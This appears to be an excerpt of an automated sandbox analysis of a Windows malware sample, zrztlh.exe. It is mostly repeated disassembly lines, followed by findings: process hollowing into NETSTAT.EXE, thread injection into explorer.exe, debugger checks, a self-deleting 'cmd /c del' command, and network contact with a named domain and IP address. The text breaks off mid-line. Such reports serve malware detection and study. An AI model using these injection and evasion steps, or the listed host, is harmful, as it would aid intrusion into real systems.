          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0340FEC0 mov eax, dword ptr fs:[00000030h]10_2_0340FEC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336AAB0 mov eax, dword ptr fs:[00000030h]10_2_0336AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336AAB0 mov eax, dword ptr fs:[00000030h]10_2_0336AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338FAB0 mov eax, dword ptr fs:[00000030h]10_2_0338FAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033552A5 mov eax, dword ptr fs:[00000030h]10_2_033552A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033552A5 mov eax, dword ptr fs:[00000030h]10_2_033552A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033552A5 mov eax, dword ptr fs:[00000030h]10_2_033552A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033552A5 mov eax, dword ptr fs:[00000030h]10_2_033552A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033552A5 mov eax, dword ptr fs:[00000030h]10_2_033552A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03428ED6 mov eax, dword ptr fs:[00000030h]10_2_03428ED6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D46A7 mov eax, dword ptr fs:[00000030h]10_2_033D46A7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338D294 mov eax, dword ptr fs:[00000030h]10_2_0338D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338D294 mov eax, dword ptr fs:[00000030h]10_2_0338D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EFE87 mov eax, dword ptr fs:[00000030h]10_2_033EFE87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033676E2 mov eax, dword ptr fs:[00000030h]10_2_033676E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033816E0 mov ecx, dword ptr fs:[00000030h]10_2_033816E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03382AE4 mov eax, dword ptr fs:[00000030h]10_2_03382AE4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03420EA5 mov eax, dword ptr fs:[00000030h]10_2_03420EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03420EA5 mov eax, dword ptr fs:[00000030h]10_2_03420EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03420EA5 mov eax, dword ptr fs:[00000030h]10_2_03420EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03382ACB mov eax, dword ptr fs:[00000030h]10_2_03382ACB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033836CC mov eax, dword ptr fs:[00000030h]10_2_033836CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03398EC7 mov eax, dword ptr fs:[00000030h]10_2_03398EC7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338513A mov eax, dword ptr fs:[00000030h]10_2_0338513A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338513A mov eax, dword ptr fs:[00000030h]10_2_0338513A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03363D34 mov eax, dword ptr fs:[00000030h]10_2_03363D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03363D34 mov eax, dword ptr fs:[00000030h]10_2_03363D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03363D34 mov eax, dword ptr fs:[00000030h]10_2_03363D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03363D34 mov eax, dword ptr fs:[00000030h]10_2_03363D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03363D34 mov eax, dword ptr fs:[00000030h]10_2_03363D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03363D34 mov eax, dword ptr fs:[00000030h]10_2_03363D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03363D34 mov eax, dword ptr fs:[00000030h]10_2_03363D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03363D34 mov eax, dword ptr fs:[00000030h]10_2_03363D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03363D34 mov eax, dword ptr fs:[00000030h]10_2_03363D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03363D34 mov eax, dword ptr fs:[00000030h]10_2_03363D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03363D34 mov eax, dword ptr fs:[00000030h]10_2_03363D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03363D34 mov eax, dword ptr fs:[00000030h]10_2_03363D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03363D34 mov eax, dword ptr fs:[00000030h]10_2_03363D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03384D3B mov eax, dword ptr fs:[00000030h]10_2_03384D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03384D3B mov eax, dword ptr fs:[00000030h]10_2_03384D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03384D3B mov eax, dword ptr fs:[00000030h]10_2_03384D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335AD30 mov eax, dword ptr fs:[00000030h]10_2_0335AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033DA537 mov eax, dword ptr fs:[00000030h]10_2_033DA537
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03374120 mov eax, dword ptr fs:[00000030h]10_2_03374120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03374120 mov eax, dword ptr fs:[00000030h]10_2_03374120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03374120 mov eax, dword ptr fs:[00000030h]10_2_03374120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03374120 mov eax, dword ptr fs:[00000030h]10_2_03374120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03374120 mov ecx, dword ptr fs:[00000030h]10_2_03374120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03359100 mov eax, dword ptr fs:[00000030h]10_2_03359100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03359100 mov eax, dword ptr fs:[00000030h]10_2_03359100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03359100 mov eax, dword ptr fs:[00000030h]10_2_03359100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337C577 mov eax, dword ptr fs:[00000030h]10_2_0337C577
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337C577 mov eax, dword ptr fs:[00000030h]10_2_0337C577
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335B171 mov eax, dword ptr fs:[00000030h]10_2_0335B171
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335B171 mov eax, dword ptr fs:[00000030h]10_2_0335B171
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335C962 mov eax, dword ptr fs:[00000030h]10_2_0335C962
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03377D50 mov eax, dword ptr fs:[00000030h]10_2_03377D50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337B944 mov eax, dword ptr fs:[00000030h]10_2_0337B944
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337B944 mov eax, dword ptr fs:[00000030h]10_2_0337B944
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03428D34 mov eax, dword ptr fs:[00000030h]10_2_03428D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03393D43 mov eax, dword ptr fs:[00000030h]10_2_03393D43
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D3540 mov eax, dword ptr fs:[00000030h]10_2_033D3540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D51BE mov eax, dword ptr fs:[00000030h]10_2_033D51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D51BE mov eax, dword ptr fs:[00000030h]10_2_033D51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D51BE mov eax, dword ptr fs:[00000030h]10_2_033D51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D51BE mov eax, dword ptr fs:[00000030h]10_2_033D51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03381DB5 mov eax, dword ptr fs:[00000030h]10_2_03381DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03381DB5 mov eax, dword ptr fs:[00000030h]10_2_03381DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03381DB5 mov eax, dword ptr fs:[00000030h]10_2_03381DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033861A0 mov eax, dword ptr fs:[00000030h]10_2_033861A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033861A0 mov eax, dword ptr fs:[00000030h]10_2_033861A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033835A1 mov eax, dword ptr fs:[00000030h]10_2_033835A1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D69A6 mov eax, dword ptr fs:[00000030h]10_2_033D69A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338FD9B mov eax, dword ptr fs:[00000030h]10_2_0338FD9B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338FD9B mov eax, dword ptr fs:[00000030h]10_2_0338FD9B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0341FDE2 mov eax, dword ptr fs:[00000030h]10_2_0341FDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0341FDE2 mov eax, dword ptr fs:[00000030h]10_2_0341FDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0341FDE2 mov eax, dword ptr fs:[00000030h]10_2_0341FDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0341FDE2 mov eax, dword ptr fs:[00000030h]10_2_0341FDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03382990 mov eax, dword ptr fs:[00000030h]10_2_03382990
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03408DF1 mov eax, dword ptr fs:[00000030h]10_2_03408DF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337C182 mov eax, dword ptr fs:[00000030h]10_2_0337C182
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03382581 mov eax, dword ptr fs:[00000030h]10_2_03382581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03382581 mov eax, dword ptr fs:[00000030h]10_2_03382581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03382581 mov eax, dword ptr fs:[00000030h]10_2_03382581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03382581 mov eax, dword ptr fs:[00000030h]10_2_03382581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338A185 mov eax, dword ptr fs:[00000030h]10_2_0338A185
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03352D8A mov eax, dword ptr fs:[00000030h]10_2_03352D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03352D8A mov eax, dword ptr fs:[00000030h]10_2_03352D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03352D8A mov eax, dword ptr fs:[00000030h]10_2_03352D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03352D8A mov eax, dword ptr fs:[00000030h]10_2_03352D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03352D8A mov eax, dword ptr fs:[00000030h]10_2_03352D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335B1E1 mov eax, dword ptr fs:[00000030h]10_2_0335B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335B1E1 mov eax, dword ptr fs:[00000030h]10_2_0335B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335B1E1 mov eax, dword ptr fs:[00000030h]10_2_0335B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033E41E8 mov eax, dword ptr fs:[00000030h]10_2_033E41E8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336D5E0 mov eax, dword ptr fs:[00000030h]10_2_0336D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336D5E0 mov eax, dword ptr fs:[00000030h]10_2_0336D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034205AC mov eax, dword ptr fs:[00000030h]10_2_034205AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034205AC mov eax, dword ptr fs:[00000030h]10_2_034205AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6DC9 mov eax, dword ptr fs:[00000030h]10_2_033D6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6DC9 mov eax, dword ptr fs:[00000030h]10_2_033D6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6DC9 mov eax, dword ptr fs:[00000030h]10_2_033D6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6DC9 mov ecx, dword ptr fs:[00000030h]10_2_033D6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6DC9 mov eax, dword ptr fs:[00000030h]10_2_033D6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6DC9 mov eax, dword ptr fs:[00000030h]10_2_033D6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338BC2C mov eax, dword ptr fs:[00000030h]10_2_0338BC2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338002D mov eax, dword ptr fs:[00000030h]10_2_0338002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338002D mov eax, dword ptr fs:[00000030h]10_2_0338002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338002D mov eax, dword ptr fs:[00000030h]10_2_0338002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338002D mov eax, dword ptr fs:[00000030h]10_2_0338002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338002D mov eax, dword ptr fs:[00000030h]10_2_0338002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336B02A mov eax, dword ptr fs:[00000030h]10_2_0336B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336B02A mov eax, dword ptr fs:[00000030h]10_2_0336B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336B02A mov eax, dword ptr fs:[00000030h]10_2_0336B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336B02A mov eax, dword ptr fs:[00000030h]10_2_0336B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D7016 mov eax, dword ptr fs:[00000030h]10_2_033D7016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D7016 mov eax, dword ptr fs:[00000030h]10_2_033D7016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D7016 mov eax, dword ptr fs:[00000030h]10_2_033D7016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03412073 mov eax, dword ptr fs:[00000030h]10_2_03412073
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03421074 mov eax, dword ptr fs:[00000030h]10_2_03421074
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6C0A mov eax, dword ptr fs:[00000030h]10_2_033D6C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6C0A mov eax, dword ptr fs:[00000030h]10_2_033D6C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6C0A mov eax, dword ptr fs:[00000030h]10_2_033D6C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6C0A mov eax, dword ptr fs:[00000030h]10_2_033D6C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0342740D mov eax, dword ptr fs:[00000030h]10_2_0342740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0342740D mov eax, dword ptr fs:[00000030h]10_2_0342740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0342740D mov eax, dword ptr fs:[00000030h]10_2_0342740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03424015 mov eax, dword ptr fs:[00000030h]10_2_03424015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03424015 mov eax, dword ptr fs:[00000030h]10_2_03424015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337746D mov eax, dword ptr fs:[00000030h]10_2_0337746D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03370050 mov eax, dword ptr fs:[00000030h]10_2_03370050
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03370050 mov eax, dword ptr fs:[00000030h]10_2_03370050
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EC450 mov eax, dword ptr fs:[00000030h]10_2_033EC450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EC450 mov eax, dword ptr fs:[00000030h]10_2_033EC450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338A44B mov eax, dword ptr fs:[00000030h]10_2_0338A44B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338F0BF mov ecx, dword ptr fs:[00000030h]10_2_0338F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338F0BF mov eax, dword ptr fs:[00000030h]10_2_0338F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338F0BF mov eax, dword ptr fs:[00000030h]10_2_0338F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03428CD6 mov eax, dword ptr fs:[00000030h]10_2_03428CD6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033990AF mov eax, dword ptr fs:[00000030h]10_2_033990AF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033820A0 mov eax, dword ptr fs:[00000030h]10_2_033820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033820A0 mov eax, dword ptr fs:[00000030h]10_2_033820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033820A0 mov eax, dword ptr fs:[00000030h]10_2_033820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033820A0 mov eax, dword ptr fs:[00000030h]10_2_033820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033820A0 mov eax, dword ptr fs:[00000030h]10_2_033820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033820A0 mov eax, dword ptr fs:[00000030h]10_2_033820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336849B mov eax, dword ptr fs:[00000030h]10_2_0336849B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03359080 mov eax, dword ptr fs:[00000030h]10_2_03359080
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D3884 mov eax, dword ptr fs:[00000030h]10_2_033D3884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D3884 mov eax, dword ptr fs:[00000030h]10_2_033D3884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034114FB mov eax, dword ptr fs:[00000030h]10_2_034114FB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6CF0 mov eax, dword ptr fs:[00000030h]10_2_033D6CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6CF0 mov eax, dword ptr fs:[00000030h]10_2_033D6CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6CF0 mov eax, dword ptr fs:[00000030h]10_2_033D6CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033558EC mov eax, dword ptr fs:[00000030h]10_2_033558EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EB8D0 mov eax, dword ptr fs:[00000030h]10_2_033EB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EB8D0 mov ecx, dword ptr fs:[00000030h]10_2_033EB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EB8D0 mov eax, dword ptr fs:[00000030h]10_2_033EB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EB8D0 mov eax, dword ptr fs:[00000030h]10_2_033EB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EB8D0 mov eax, dword ptr fs:[00000030h]10_2_033EB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EB8D0 mov eax, dword ptr fs:[00000030h]10_2_033EB8D0
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0040ACF0 LdrLoadDll,2_2_0040ACF0
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EB1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00EB1D88
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EB1D57 SetUnhandledExceptionFilter,1_2_00EB1D57
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00EB1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00EB1D88
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00EB1D57 SetUnhandledExceptionFilter,2_2_00EB1D57

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.savingshk.com
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 1180000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeThread register set: target process: 684Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 684Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeProcess created: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemxJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\zrztlh.exe"Jump to behavior
          Source: explorer.exe, 00000003.00000000.516249956.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.512096551.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.497020918.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.506026358.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.486135507.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.565839731.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.486135507.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.565839731.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.453908478.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: YProgram Managerf
          Source: explorer.exe, 00000003.00000000.486135507.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.565839731.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.453908478.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_00EBE8C3
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 